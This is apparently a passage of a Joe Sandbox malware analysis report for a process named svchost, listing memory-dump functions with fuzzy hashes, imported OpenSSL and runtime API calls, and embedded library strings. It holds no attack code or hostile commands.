                                                                                            • Instruction Fuzzy Hash: 4881B232A2C54A86F600DBD4C46439DBBA2F392348FC45632E18E87250DBB9DD56C7C0
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d34869fc81dd826596a7c468576a77680280a3ac93da3390e048e1171c9a76d1
                                                                                            • Instruction ID: 8bb5db816e21e0249355af8c3a1565cb559f4c0a58edb9989f91a8e6b5780a8e
                                                                                            • Opcode Fuzzy Hash: d34869fc81dd826596a7c468576a77680280a3ac93da3390e048e1171c9a76d1
                                                                                            • Instruction Fuzzy Hash: 5DA1236266858686F320CBA8D85036D3F91EB96348FC05B32E25DE73E0D779DE45CB41
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug$R_vset_errorX_new_from_pkey
                                                                                            • String ID: $ssl\statem\statem_clnt.c$tls_construct_cke_gost
                                                                                            • API String ID: 3530350984-3523713963
                                                                                            • Opcode ID: c4c2be5d1886bd7c459c428cd5f6cdeec09414fc3d768c4178067a949d798fec
                                                                                            • Instruction ID: d02ad0e0de4e77fba75a2eaf0b040b9c8f7f60347d8b45b653aa93ee3db9a69b
                                                                                            • Opcode Fuzzy Hash: c4c2be5d1886bd7c459c428cd5f6cdeec09414fc3d768c4178067a949d798fec
                                                                                            • Instruction Fuzzy Hash: 04819131B0A68347FA64A722D4717F92752AF89780F882431DE4D67787EF3EE5058708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: L_sk_value$L_sk_num$L_sk_findL_sk_freememchr
                                                                                            • String ID: $SHA2-256
                                                                                            • API String ID: 2914672735-3630060591
                                                                                            • Opcode ID: 197518af10299bf8c513597842f17972a24b38605a6898080e2796ef2e9e21dd
                                                                                            • Instruction ID: b601632697726b3dc8c6eeb621e999a2cbf5826787adca6c50159f48d810da3e
                                                                                            • Opcode Fuzzy Hash: 197518af10299bf8c513597842f17972a24b38605a6898080e2796ef2e9e21dd
                                                                                            • Instruction Fuzzy Hash: F2C1B421B0A64242FB659A2691623F92792EF47BC5F0CA035DE0E67787DE3EE4418748
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3448016000.0000000066001000.00000020.00000001.01000000.00000013.sdmp, Offset: 66000000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3447969945.0000000066000000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448075798.000000006601E000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448241150.00000000660EF000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448283516.00000000660F0000.00000002.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448334850.00000000660F1000.00000004.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp
                                                                                             • Associated: 0000002A.00000002.3448405346.00000000660F5000.00000002.00000001.01000000.00000013.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_66000000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: abort
                                                                                            • String ID: %"$~
                                                                                            • API String ID: 4206212132-3409227523
                                                                                            • Opcode ID: 357b63396c3512d4b18d125c3f3fed3988ec2f5c2de7e57da0e7c3bada520e8b
                                                                                            • Instruction ID: 3e8c679f720ea173282e1251cf057b69790f8985ad419b173015c1842cc6ff2b
                                                                                            • Opcode Fuzzy Hash: 357b63396c3512d4b18d125c3f3fed3988ec2f5c2de7e57da0e7c3bada520e8b
                                                                                            • Instruction Fuzzy Hash: 48D11572B1855A96F700CB98D89479CBBA2F393748FC04632D60DC7394D76ADD9ACB80
                                                                                            APIs
                                                                                            • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D4C1
                                                                                            • CRYPTO_zalloc.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D4DE
                                                                                            • OBJ_txt2nid.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D50C
                                                                                            • CONF_parse_list.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D55B
                                                                                            • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D56E
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D586
                                                                                            • ERR_set_error.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D59D
                                                                                            • CRYPTO_malloc.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D5C4
                                                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D5DC
                                                                                            • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D5F7
                                                                                            • CRYPTO_free.LIBCRYPTO-3-X64(?,?,?,?,?,?,?,00007FFDA3608010), ref: 00007FFDA362D610
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_free$F_parse_listJ_txt2nidO_mallocO_zallocR_newR_set_debugR_set_errormemcpy
                                                                                            • String ID: No valid signature algorithms in '%s'$ssl\t1_lib.c$tls1_set_sigalgs_list
                                                                                            • API String ID: 2783265381-2346630447
                                                                                            • Opcode ID: 9605a27f74ca95cfa6e2d663d6db4e625902f1c2617fdcc21c395bcbd9764aa3
                                                                                            • Instruction ID: b74356fae3c2a62df541cc41a7ff686ceb400b027b478a141848f99f6fd03862
                                                                                            • Opcode Fuzzy Hash: 9605a27f74ca95cfa6e2d663d6db4e625902f1c2617fdcc21c395bcbd9764aa3
                                                                                            • Instruction Fuzzy Hash: 1651C722B06B4286FB50DF51E8602B96392FF49B84F492032DE4D67B96DF3EE011C305
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_new$O_freeR_set_debugi2d_
                                                                                            • String ID: ssl\statem\statem_lib.c$tls_output_rpk
                                                                                            • API String ID: 1734496139-3340282326
                                                                                            • Opcode ID: 0434b11e71eeb1a927023dbb3a43dede19d7183b6f75b271aff535cf7599750a
                                                                                            • Instruction ID: 85c77f498cb3895a3da5c48862ce7d33c6dc80bdc54e3df39c3051b24dde5128
                                                                                            • Opcode Fuzzy Hash: 0434b11e71eeb1a927023dbb3a43dede19d7183b6f75b271aff535cf7599750a
                                                                                            • Instruction Fuzzy Hash: 8351C321B0F64283FB10DA1798707BD66439F89B84F0C6031EA4DA77C7DE6EE541871A
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc$ByteCharInfoLocaleMultiWidememsetstrspn
                                                                                            • String ID: 0123456789$CP%s$CP%u$U$utf8
                                                                                            • API String ID: 3896320244-1747673053
                                                                                            • Opcode ID: c69ca0f0c0ce6d2260eeb5b107b055d132123da6641f26da8d9d6cc1127de9c5
                                                                                            • Instruction ID: b71aec450234e2fa15d4d5a36f23dc0e944ce4bcce1ac0b46d850451b93aef24
                                                                                            • Opcode Fuzzy Hash: c69ca0f0c0ce6d2260eeb5b107b055d132123da6641f26da8d9d6cc1127de9c5
                                                                                            • Instruction Fuzzy Hash: AD41D63170F68681FB218B15E4313B567A2EF4AB84F4CA035DA5E27B97DE3EE4058704
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug$R_vset_error
                                                                                            • String ID: ssl\statem\extensions_clnt.c$tls_parse_stoc_server_name
                                                                                            • API String ID: 4275876640-3375710298
                                                                                            • Opcode ID: 8d7a682abe7cb507a9198a9a24b66b76ecc5ec11f53184df7939f1f6f3d6db20
                                                                                            • Instruction ID: bb85b125f0cd19ad741aa4b6fbae5dca2c9cadee50f6c75c176538e2f2a8a7b9
                                                                                            • Opcode Fuzzy Hash: 8d7a682abe7cb507a9198a9a24b66b76ecc5ec11f53184df7939f1f6f3d6db20
                                                                                            • Instruction Fuzzy Hash: C8319E71F0A58287F7919B61D8A17F92262DF88744F8C2832C90C96793DF6EE5C68718
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                             • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: R_newR_set_debug$O_freeO_memdupR_vset_error
                                                                                            • String ID: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\include\internal/packet.h$ssl\statem\statem_srvr.c$tls_process_next_proto
                                                                                            • API String ID: 464498836-56982555
                                                                                            • Opcode ID: 63642cc689758fb4ec4ee4fe9c4727acf58d27852583a43ad9a713bda0192c09
                                                                                            • Instruction ID: 714758172d98901b95d43457c36bfae24d8acbf33103a4f30db0a7e56fdf4c59
                                                                                            • Opcode Fuzzy Hash: 63642cc689758fb4ec4ee4fe9c4727acf58d27852583a43ad9a713bda0192c09
                                                                                            • Instruction Fuzzy Hash: 3541D122F0EBC182F7109B15E4602F9A3A1FB99784F4C5231EA8C67B57DF2DE5918704
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                             • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                             • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 313767242-0
                                                                                            • Opcode ID: f2601ce0e451a39edef9d8f9ef1887be3943e43da16021d90865413426156ae3
                                                                                            • Instruction ID: 84f4bb64240038b9d9294f60f1be74b47ec7adb7c480484e367d09b7ad63e21f
                                                                                            • Opcode Fuzzy Hash: f2601ce0e451a39edef9d8f9ef1887be3943e43da16021d90865413426156ae3
                                                                                            • Instruction Fuzzy Hash: A9314C7270AB818AFB608F60E8507ED7362FB84744F48503ADA4E57B9ADF39D548C718
                                                                                            APIs
                                                                                            • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA368DD7A
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFDA368DD92
                                                                                            • CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFDA368DE90
                                                                                              • Part of subcall function 00007FFDA368C5A0: ERR_new.LIBCRYPTO-3-X64(?,?,00007FFDA368DD65), ref: 00007FFDA368C62D
                                                                                              • Part of subcall function 00007FFDA368C5A0: ERR_set_debug.LIBCRYPTO-3-X64(?,?,00007FFDA368DD65), ref: 00007FFDA368C645
                                                                                              • Part of subcall function 00007FFDA3609F90: CRYPTO_malloc.LIBCRYPTO-3-X64 ref: 00007FFDA360A012
                                                                                              • Part of subcall function 00007FFDA3609F90: memset.VCRUNTIME140 ref: 00007FFDA360A040
                                                                                              • Part of subcall function 00007FFDA3609F90: memcpy.VCRUNTIME140 ref: 00007FFDA360A075
                                                                                              • Part of subcall function 00007FFDA3609F90: CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFDA360A091
                                                                                              • Part of subcall function 00007FFDA3609F90: CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFDA360A0EA
                                                                                              • Part of subcall function 00007FFDA3609F90: CRYPTO_clear_free.LIBCRYPTO-3-X64 ref: 00007FFDA360A162
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_clear_free$R_newR_set_debug$O_mallocmemcpymemset
                                                                                            • String ID: ssl\statem\statem_srvr.c$tls_process_client_key_exchange
                                                                                            • API String ID: 1067245891-2683773349
                                                                                            • Opcode ID: 1c0b79c31e8a9f3943a6edc68d542a649b7dabfdcd0a743967adedc52196357a
                                                                                            • Instruction ID: fd3d61a927900c518ed58da129e8982cf71b062e49cbff206afe721cd78af9d0
                                                                                            • Opcode Fuzzy Hash: 1c0b79c31e8a9f3943a6edc68d542a649b7dabfdcd0a743967adedc52196357a
                                                                                            • Instruction Fuzzy Hash: 0B415061F1A74343F6A49B15A8253BA5293AF4CBC4F4C7431EA0E677D7CE2EE4418318
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseHandleO_free$CriticalDeleteSection
                                                                                            • String ID: crypto\thread\arch\thread_win.c
                                                                                            • API String ID: 229191846-2915021490
                                                                                            • Opcode ID: fc00095f480be750e8aaaf4deb890c97a185db73c58a544a99d5a012bd22efca
                                                                                            • Instruction ID: f55e1dd21f3d6aa4542bca2bf9e5694dfd59c910131a45340619016a2c9a29d4
                                                                                            • Opcode Fuzzy Hash: fc00095f480be750e8aaaf4deb890c97a185db73c58a544a99d5a012bd22efca
                                                                                            • Instruction Fuzzy Hash: 12015E36B0AA4281FB409F61F8A136C6361AF49F88F0C6031DA4D17796DF3DD4548315
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_ctrl
                                                                                            • String ID:
                                                                                            • API String ID: 3605655398-0
                                                                                            • Opcode ID: a27e86e80905aea8330afc17b001a7515fd857808354a942692a85eeb138a060
                                                                                            • Instruction ID: 6b7d42522a6c5101c7bb5e7bd427adc051c0a07a35bb12ef4d63014da31380d0
                                                                                            • Opcode Fuzzy Hash: a27e86e80905aea8330afc17b001a7515fd857808354a942692a85eeb138a060
                                                                                            • Instruction Fuzzy Hash: 8531B33372A28186EB88DB76D5A1BFD6692FB89B84F086035DB4D57792DF3994108304
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: D_get_sizeO_ctrlR_newR_set_debug
                                                                                            • String ID: ssl\statem\statem_clnt.c$tls_client_key_exchange_post_work
                                                                                            • API String ID: 1235234083-4270237895
                                                                                            • Opcode ID: 0816d56e2509e0f4ae9fa03be8bdc46a30fb3ab9f700cd7b5f453e55606019e1
                                                                                            • Instruction ID: 141f67040edcadafd8e708a38c6fdd8dff2f52fa610940b3f58a230535202450
                                                                                            • Opcode Fuzzy Hash: 0816d56e2509e0f4ae9fa03be8bdc46a30fb3ab9f700cd7b5f453e55606019e1
                                                                                            • Instruction Fuzzy Hash: 4B818431B0A74289FB749A15D4647B823D2EB41B84FAC6136C90DA7397DF2EE491C318
                                                                                            APIs
                                                                                            • GetUserNameA.ADVAPI32 ref: 00007FFDA36D289F
                                                                                            • GetLastError.KERNEL32 ref: 00007FFDA36D28AE
                                                                                              • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFDA36D1C16,?,?,?,?,00007FFDA36D1CA5), ref: 00007FFDA36E2CE8
                                                                                              • Part of subcall function 00007FFDA36E2CD0: _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDA36E2D10
                                                                                              • Part of subcall function 00007FFDA36E2CD0: libintl_dgettext.LIBINTL-9 ref: 00007FFDA36E2D31
                                                                                            • _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDA36D28CD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$ErrorLastNameUser_strduplibintl_dgettext
                                                                                            • String ID: out of memory$user name lookup failure: error code %lu
                                                                                            • API String ID: 545883064-2849081202
                                                                                            • Opcode ID: 48445d2c40410990b2fc367bc245d2915f73ef1ad6e122f3025d8d8df7d0b452
                                                                                            • Instruction ID: d8df994b7a2a0b0e5d2b1c46436b5a06e0955ecb9035722db2b2a39a132d739a
                                                                                            • Opcode Fuzzy Hash: 48445d2c40410990b2fc367bc245d2915f73ef1ad6e122f3025d8d8df7d0b452
                                                                                            • Instruction Fuzzy Hash: A2114232B1AA8282FEA09B15F8253B56352BF58B84F4C2435D94D56756EF3EE1088708
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: O_zalloc$O_free
                                                                                            • String ID: ssl\ssl_cert.c
                                                                                            • API String ID: 1411191933-188639428
                                                                                            • Opcode ID: 81b3e0db84fb033b429e26bebb1a7555325c1882484021551ba5a7b1b61c1967
                                                                                            • Instruction ID: 6ba1f31ccaa4e8d05c63b50abb5ddec163aa88e92158d29ef52e99898469f34e
                                                                                            • Opcode Fuzzy Hash: 81b3e0db84fb033b429e26bebb1a7555325c1882484021551ba5a7b1b61c1967
                                                                                            • Instruction Fuzzy Hash: 3A118C7271674286FB81CB24E4A53A873A1FB09B84F4CA131CA4D07356EF7EE554C718
                                                                                            APIs
                                                                                            • CRYPTO_free_ex_data.LIBCRYPTO-3-X64(?,00007FFDA3647F02,?,00007FFDA3643609), ref: 00007FFDA361738E
                                                                                            • CRYPTO_THREAD_lock_free.LIBCRYPTO-3-X64(?,00007FFDA3647F02,?,00007FFDA3643609), ref: 00007FFDA36173AF
                                                                                            • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFDA3647F02,?,00007FFDA3643609), ref: 00007FFDA36173C4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmp
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: D_lock_freeO_freeO_free_ex_data
                                                                                            • String ID: ssl\ssl_lib.c
                                                                                            • API String ID: 1442806380-1984206432
